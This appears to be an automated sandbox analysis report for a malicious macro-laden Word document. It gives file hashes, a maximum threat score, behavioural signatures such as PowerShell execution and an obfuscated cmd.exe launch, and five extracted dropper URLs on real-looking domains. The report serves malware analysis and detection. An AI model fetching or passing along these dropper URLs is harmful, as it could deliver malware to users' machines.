Overview

overview

10

Static

static

8

f6010602af...18.doc

windows7-x64

10

f6010602af...18.doc

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    f6010602af25513e5e82d4640807d08d_JaffaCakes118

  • Size

    90KB

  • Sample

    241215-2ahp7szmet

  • MD5

    f6010602af25513e5e82d4640807d08d

  • SHA1

    cc045aa7f68e85e0877364db80399bdbf0ecdbf6

  • SHA256

    ae4f24905553e34675bfa73dc2048fbe0c05170945c1c7e0fbcf38bfd5005c6c

  • SHA512

    bb59090bac795cd8b7e6cfc4d520654046c9a0f41914a5c8e7df6948b785108d7b672a58e13aa25a5b7684b05ad15d760b270a44f903d7506d4abe88e2bb72e3

  • SSDEEP

    1536:qptJlmrJpmxlRw99NBr+a239xfP2G9HdpkX:2te2dw99fy9MqHsX

Score
10/10
discoveryexecutionmacromacro_on_action

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://circuloproviamiga.com/wp-content/themes/fO2OYUW09
exe.dropper

http://raidking.com/d0dtPLO2Ke
exe.dropper

http://kulikovonn.ru/DBDTu0GH
exe.dropper

http://lindgrenfinancial.com/u8PypS85i5
exe.dropper

http://imish.ru/ImIjO2F

Targets

    • Target

      f6010602af25513e5e82d4640807d08d_JaffaCakes118

    • Size

      90KB

    • MD5

      f6010602af25513e5e82d4640807d08d

    • SHA1

      cc045aa7f68e85e0877364db80399bdbf0ecdbf6

    • SHA256

      ae4f24905553e34675bfa73dc2048fbe0c05170945c1c7e0fbcf38bfd5005c6c

    • SHA512

      bb59090bac795cd8b7e6cfc4d520654046c9a0f41914a5c8e7df6948b785108d7b672a58e13aa25a5b7684b05ad15d760b270a44f903d7506d4abe88e2bb72e3

    • SSDEEP

      1536:qptJlmrJpmxlRw99NBr+a239xfP2G9HdpkX:2te2dw99fy9MqHsX

    Score
    10/10
    discoveryexecution

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

      execution

    • An obfuscated cmd.exe command-line is typically used to evade detection.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks